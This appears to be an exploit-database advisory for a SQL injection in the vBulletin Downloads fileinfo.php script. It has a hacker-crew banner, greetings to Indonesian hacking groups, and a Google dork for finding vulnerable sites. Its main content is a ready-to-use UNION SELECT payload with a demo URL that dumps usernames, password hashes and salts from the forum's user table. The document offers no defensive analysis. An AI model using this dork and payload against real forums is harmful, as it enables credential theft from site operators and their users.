=========================================== Vbulletin Downloads FileInfo SQL Injection =========================================== [+]Title : Vbulletin Downloads FileInfo SQL Injection [+]Software : FileInfo [+]Vendor : http://www.vbulletin.com [+]Download : http://www.vbulletin.com/download.php [+]Author : jos_ali_joe [+]Contact : josalijoe[at]yahoo[dot]com [+]Home : http://josalijoe.wordpress.com/ .___ .___ .__ _________ .___ | | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \_ ___ \ ____ __| _/ ____ _______ | | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \ / \ / \ \/ / _ \ / __ | _/ __ \ \_ __ \ | || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_| | \\ \____( <_> )/ /_/ | \ ___/ | | \/ |___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /|___| / \______ / \____/ \____ | \___ > |__| \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ ######################################################################## Dork : inurl:"downloads/fileinfo.php" ######################################################################## ------------------------------------------------------------------------ SQL Exploit Exploit : +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,concat(username,0x3a,password,0x3a,salt ),19,20,21,22,23,24,25,26+from+user/* Demo Exploit : http://localhost/downloads/fileinfo.php?id=-461+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,concat(username,0x3a,password,0x3a,salt),19,20,21,22,23,24,25,26+from+user/* -------------------------------------------------------------------------- Greets For : ./Devilzc0de crew - Kebumen Cyber - Explore Crew - Indonesian Hacker - Tecon Crew - Security Hub ./Byroe Net - Yogya Carderlink - anten4 - All Underground Forum Indonesia My Team : ./Indonesian Coder & inj3ct0r Special Thanks : Security Reason - Packetstorm Security [+] Note : Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.